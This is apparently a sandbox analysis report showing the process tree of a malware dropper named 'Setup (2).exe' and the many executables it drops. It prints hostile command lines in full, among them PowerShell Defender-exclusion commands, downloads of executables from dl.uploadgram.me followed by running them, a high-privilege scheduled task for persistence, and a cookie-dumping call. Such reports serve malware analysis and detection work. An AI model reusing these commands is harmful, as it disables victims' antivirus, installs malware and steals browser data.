PID 1752 wrote to memory of 1972	1752	Setup (2).exe	DOD0VThr9ITNo52pPJVzHQFK.exe
PID 1752 wrote to memory of 3680	1752	Setup (2).exe	qcGb9v5y7YVfJDE6kI5XCMnU.exe
PID 1752 wrote to memory of 3680	1752	Setup (2).exe	qcGb9v5y7YVfJDE6kI5XCMnU.exe
PID 1752 wrote to memory of 3680	1752	Setup (2).exe	qcGb9v5y7YVfJDE6kI5XCMnU.exe
PID 1752 wrote to memory of 3088	1752	Setup (2).exe	1LamdEUrG0vln5Y6X8JO8T2X.exe
PID 1752 wrote to memory of 3088	1752	Setup (2).exe	1LamdEUrG0vln5Y6X8JO8T2X.exe
PID 1752 wrote to memory of 3088	1752	Setup (2).exe	1LamdEUrG0vln5Y6X8JO8T2X.exe
PID 1752 wrote to memory of 3696	1752	Setup (2).exe	64AAZ3NFn1v4pDaF45SgvCVe.exe
PID 1752 wrote to memory of 3696	1752	Setup (2).exe	64AAZ3NFn1v4pDaF45SgvCVe.exe
PID 1752 wrote to memory of 3696	1752	Setup (2).exe	64AAZ3NFn1v4pDaF45SgvCVe.exe
PID 1752 wrote to memory of 4156	1752	Setup (2).exe	x6wZkgQfsAq3vmu6gLRSnJ8j.exe
PID 1752 wrote to memory of 4156	1752	Setup (2).exe	x6wZkgQfsAq3vmu6gLRSnJ8j.exe
PID 1752 wrote to memory of 4156	1752	Setup (2).exe	x6wZkgQfsAq3vmu6gLRSnJ8j.exe

C:\Users\Admin\AppData\Local\Temp\Setup (2).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (2).exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1752

C:\Users\Admin\Documents\KC9LoCJcdUlMD1HGU_5_Oqj8.exe
"C:\Users\Admin\Documents\KC9LoCJcdUlMD1HGU_5_Oqj8.exe"
2⤵
- Executes dropped EXE
PID:3008

C:\Users\Admin\Documents\KC9LoCJcdUlMD1HGU_5_Oqj8.exe
"C:\Users\Admin\Documents\KC9LoCJcdUlMD1HGU_5_Oqj8.exe"
3⤵
PID:5160

C:\Users\Admin\Documents\re5gXSGRiSUASR4uA61S4_z8.exe
"C:\Users\Admin\Documents\re5gXSGRiSUASR4uA61S4_z8.exe"
2⤵
- Executes dropped EXE
PID:2664

C:\Users\Admin\Documents\xuvxPIejRv6FztmHksPMcUKl.exe
"C:\Users\Admin\Documents\xuvxPIejRv6FztmHksPMcUKl.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2656

C:\Users\Admin\Documents\jofjsUkJjOeCP4yDpBx9DmvG.exe
"C:\Users\Admin\Documents\jofjsUkJjOeCP4yDpBx9DmvG.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3624

C:\Users\Admin\Documents\jofjsUkJjOeCP4yDpBx9DmvG.exe
C:\Users\Admin\Documents\jofjsUkJjOeCP4yDpBx9DmvG.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4996

C:\Users\Admin\Documents\0pZVLUVR63Tztm7oZQCP50pT.exe
"C:\Users\Admin\Documents\0pZVLUVR63Tztm7oZQCP50pT.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3408

C:\Users\Admin\Documents\7ZpH1YJjEZ1iBO5uknAQ4wyO.exe
"C:\Users\Admin\Documents\7ZpH1YJjEZ1iBO5uknAQ4wyO.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:388

C:\Users\Admin\Documents\7ZpH1YJjEZ1iBO5uknAQ4wyO.exe
C:\Users\Admin\Documents\7ZpH1YJjEZ1iBO5uknAQ4wyO.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4988

C:\Users\Admin\Documents\JUEfkxuAALb76So533ZEiWsM.exe
"C:\Users\Admin\Documents\JUEfkxuAALb76So533ZEiWsM.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:60

C:\Users\Admin\Documents\Xuz8Dk1AiXq6ZpUU1uwydzzF.exe
"C:\Users\Admin\Documents\Xuz8Dk1AiXq6ZpUU1uwydzzF.exe"
2⤵
- Executes dropped EXE
PID:4012

C:\Users\Admin\Documents\Xuz8Dk1AiXq6ZpUU1uwydzzF.exe
C:\Users\Admin\Documents\Xuz8Dk1AiXq6ZpUU1uwydzzF.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5004

C:\Users\Admin\Documents\8SSQnh8VJ2ZXOMB2EVdhfqtx.exe
"C:\Users\Admin\Documents\8SSQnh8VJ2ZXOMB2EVdhfqtx.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3948

C:\Users\Admin\Documents\8SSQnh8VJ2ZXOMB2EVdhfqtx.exe
C:\Users\Admin\Documents\8SSQnh8VJ2ZXOMB2EVdhfqtx.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4964

C:\Users\Admin\Documents\LeIoRzLd2z_6piMMrwMWHPMP.exe
"C:\Users\Admin\Documents\LeIoRzLd2z_6piMMrwMWHPMP.exe"
2⤵
- Executes dropped EXE
PID:2160

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
3⤵
PID:4736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
4⤵
PID:8948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
4⤵
PID:5520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
4⤵
PID:9972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
4⤵
PID:2248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
4⤵
PID:9992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
4⤵
PID:9372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
4⤵
PID:10060

C:\Users\Admin\AppData\Local\Temp\installer.exe
"C:\Users\Admin\AppData\Local\Temp\installer.exe"
5⤵
PID:6468

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
6⤵
PID:10128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
7⤵
PID:8688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
7⤵
PID:5500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
7⤵
PID:7944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
6⤵
PID:9140

C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
7⤵
PID:8500

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
8⤵
PID:9724

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
9⤵
- Creates scheduled task(s)
PID:9044

C:\Windows\system32\services32.exe
"C:\Windows\system32\services32.exe"
8⤵
PID:9536

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
9⤵
PID:9936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
10⤵
PID:8504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
10⤵
PID:10104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
10⤵
PID:8232

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
9⤵
PID:10036

C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
10⤵
PID:3336

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
11⤵
PID:8600

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
12⤵
- Creates scheduled task(s)
PID:5028

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
11⤵
PID:8644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
8⤵
PID:1768

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
9⤵
PID:10156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
4⤵
PID:9672

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
5⤵
PID:9992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
4⤵
PID:7284

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
5⤵
PID:9716

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"{path}"
6⤵
PID:1448

C:\Users\Admin\Documents\NO5P176fhXgDBZjHRkQsEvWf.exe
"C:\Users\Admin\Documents\NO5P176fhXgDBZjHRkQsEvWf.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1592

C:\Users\Admin\Documents\zbXVIB49xC1RGNSfMJuiVQNh.exe
"C:\Users\Admin\Documents\zbXVIB49xC1RGNSfMJuiVQNh.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Users\Admin\AppData\Roaming\8389294.exe
"C:\Users\Admin\AppData\Roaming\8389294.exe"
3⤵
- Executes dropped EXE
PID:4372

C:\Users\Admin\AppData\Roaming\5100770.exe
"C:\Users\Admin\AppData\Roaming\5100770.exe"
3⤵
PID:4104

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
4⤵
PID:4404

C:\Users\Admin\AppData\Roaming\1924982.exe
"C:\Users\Admin\AppData\Roaming\1924982.exe"
3⤵
PID:4780

C:\Users\Admin\Documents\1k_UiTYE1VIS1RgaeGXD9h_B.exe
"C:\Users\Admin\Documents\1k_UiTYE1VIS1RgaeGXD9h_B.exe"
2⤵
- Executes dropped EXE
PID:780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 660
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 680
3⤵
- Suspicious use of SetThreadContext
- Program crash
PID:4012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 644
3⤵
- Program crash
PID:4176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 716
3⤵
- Program crash
PID:3012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 1160
3⤵
- Program crash
PID:5780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 1120
3⤵
- Program crash
PID:5760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 1164
3⤵
- Program crash
PID:5228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 1168
3⤵
- Program crash
PID:2360

C:\Users\Admin\Documents\eO17TiqSlEJ1ki0TevpMPIiI.exe
"C:\Users\Admin\Documents\eO17TiqSlEJ1ki0TevpMPIiI.exe"
2⤵
- Executes dropped EXE
PID:400

C:\Users\Admin\Documents\dwr1rb3LIc9d6jn95bW9DZDk.exe
"C:\Users\Admin\Documents\dwr1rb3LIc9d6jn95bW9DZDk.exe"
2⤵
- Executes dropped EXE
PID:3120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 660
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 672
3⤵
- Program crash
PID:3012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 676
3⤵
- Program crash
PID:3092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 748
3⤵
- Program crash
PID:4492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 1120
3⤵
- Program crash
PID:6052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 1160
3⤵
- Program crash
PID:6100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 1056
3⤵
- Program crash
PID:2624

C:\Users\Admin\Documents\VocvqYrjv0PS50F7XnxrJjCi.exe
"C:\Users\Admin\Documents\VocvqYrjv0PS50F7XnxrJjCi.exe"
2⤵
- Executes dropped EXE
PID:2180

C:\Users\Admin\Documents\gJOjTgHStPQhjAPFhilDMUye.exe
"C:\Users\Admin\Documents\gJOjTgHStPQhjAPFhilDMUye.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3568

C:\Users\Admin\Documents\64AAZ3NFn1v4pDaF45SgvCVe.exe
"C:\Users\Admin\Documents\64AAZ3NFn1v4pDaF45SgvCVe.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3696

C:\Users\Admin\Documents\1LamdEUrG0vln5Y6X8JO8T2X.exe
"C:\Users\Admin\Documents\1LamdEUrG0vln5Y6X8JO8T2X.exe"
2⤵
- Executes dropped EXE
PID:3088

C:\Users\Admin\Documents\1LamdEUrG0vln5Y6X8JO8T2X.exe
"C:\Users\Admin\Documents\1LamdEUrG0vln5Y6X8JO8T2X.exe" -q
3⤵
PID:4788

C:\Users\Admin\Documents\qcGb9v5y7YVfJDE6kI5XCMnU.exe
"C:\Users\Admin\Documents\qcGb9v5y7YVfJDE6kI5XCMnU.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3680

C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
3⤵
- Executes dropped EXE
PID:4380

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:4240

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:5556

C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
3⤵
- Executes dropped EXE
PID:4456

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4456 -s 1284
4⤵
- Program crash
PID:2716

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
3⤵
- Executes dropped EXE
PID:4412

C:\Users\Admin\Documents\DOD0VThr9ITNo52pPJVzHQFK.exe
"C:\Users\Admin\Documents\DOD0VThr9ITNo52pPJVzHQFK.exe"
2⤵
- Executes dropped EXE
PID:1972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 760
3⤵
- Program crash
PID:5256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 792
3⤵
- Program crash
PID:5968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 824
3⤵
- Program crash
PID:3904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 956
3⤵
- Program crash
PID:6036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 984
3⤵
- Program crash
PID:5224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 1020
3⤵
- Program crash
PID:4356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 1360
3⤵
- Program crash
PID:5324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 1288
3⤵
- Program crash
PID:5160

C:\Users\Admin\Documents\x6wZkgQfsAq3vmu6gLRSnJ8j.exe
"C:\Users\Admin\Documents\x6wZkgQfsAq3vmu6gLRSnJ8j.exe"
2⤵
- Executes dropped EXE
PID:4156

C:\Users\Admin\AppData\Local\Temp\is-VT6N1.tmp\x6wZkgQfsAq3vmu6gLRSnJ8j.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VT6N1.tmp\x6wZkgQfsAq3vmu6gLRSnJ8j.tmp" /SL5="$10282,138429,56832,C:\Users\Admin\Documents\x6wZkgQfsAq3vmu6gLRSnJ8j.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4480

C:\Users\Admin\AppData\Local\Temp\is-6E5PB.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-6E5PB.tmp\Setup.exe" /Verysilent
4⤵
PID:1864

C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
5⤵
PID:916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 764
6⤵
- Program crash
PID:6560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 812
6⤵
- Program crash
PID:7016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 784
6⤵
- Program crash
PID:6120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 852
6⤵
- Program crash
PID:5220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 956
6⤵
- Program crash
PID:6540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 984
6⤵
- Program crash
PID:5568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 1060
6⤵
- Program crash
PID:4792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 1344
6⤵
- Executes dropped EXE
- Program crash
PID:4788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 1448
6⤵
- Program crash
PID:864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 1468
6⤵
- Program crash
PID:7748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 900
6⤵
- Program crash
PID:7376

C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
5⤵
PID:4620

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282281 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
6⤵
PID:8096

C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
5⤵
PID:1472

C:\Users\Admin\AppData\Local\Temp\is-ODI34.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ODI34.tmp\WEATHER Manager.tmp" /SL5="$202EE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
6⤵
PID:5236

C:\Users\Admin\AppData\Local\Temp\is-U8EDD.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-U8EDD.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
7⤵
PID:4256

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-U8EDD.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-U8EDD.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282281 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
8⤵
PID:6592

C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
5⤵
PID:4936

C:\Users\Admin\AppData\Local\Temp\is-TI2SH.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TI2SH.tmp\VPN.tmp" /SL5="$202FC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
6⤵
PID:5304

C:\Users\Admin\AppData\Local\Temp\is-DAE96.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-DAE96.tmp\Setup.exe" /silent /subid=720
7⤵
PID:7252

C:\Users\Admin\AppData\Local\Temp\is-96IS8.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-96IS8.tmp\Setup.tmp" /SL5="$30282,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-DAE96.tmp\Setup.exe" /silent /subid=720
8⤵
PID:7572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
9⤵
PID:7888

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
10⤵
PID:4148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
9⤵
PID:5372

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
10⤵
PID:8532

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
9⤵
PID:8164

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
9⤵
PID:6320

C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
"C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
5⤵
PID:4952

C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
5⤵
PID:3092

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:7780

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:7900

C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
5⤵
PID:4104

C:\Users\Admin\AppData\Local\Temp\is-6BSUU.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6BSUU.tmp\MediaBurner2.tmp" /SL5="$10316,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
6⤵
PID:5532

C:\Users\Admin\AppData\Local\Temp\is-D6THF.tmp\3377047_logo_media.exe
"C:\Users\Admin\AppData\Local\Temp\is-D6THF.tmp\3377047_logo_media.exe" /S /UID=burnerch2
7⤵
PID:6008

C:\Program Files\7-Zip\VGSTDTTTRI\ultramediaburner.exe
"C:\Program Files\7-Zip\VGSTDTTTRI\ultramediaburner.exe" /VERYSILENT
8⤵
PID:7264

C:\Users\Admin\AppData\Local\Temp\is-8K0LK.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8K0LK.tmp\ultramediaburner.tmp" /SL5="$10580,281924,62464,C:\Program Files\7-Zip\VGSTDTTTRI\ultramediaburner.exe" /VERYSILENT
9⤵
PID:7296

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
10⤵
PID:7012

C:\Users\Admin\AppData\Local\Temp\a0-1ca50-a28-217a0-e26b434a4d500\Risaebiwaga.exe
"C:\Users\Admin\AppData\Local\Temp\a0-1ca50-a28-217a0-e26b434a4d500\Risaebiwaga.exe"
8⤵
PID:5668

C:\Users\Admin\AppData\Local\Temp\fa-f7d42-4ca-3739d-71c1c1e0cf06c\Baezhizhybaeja.exe
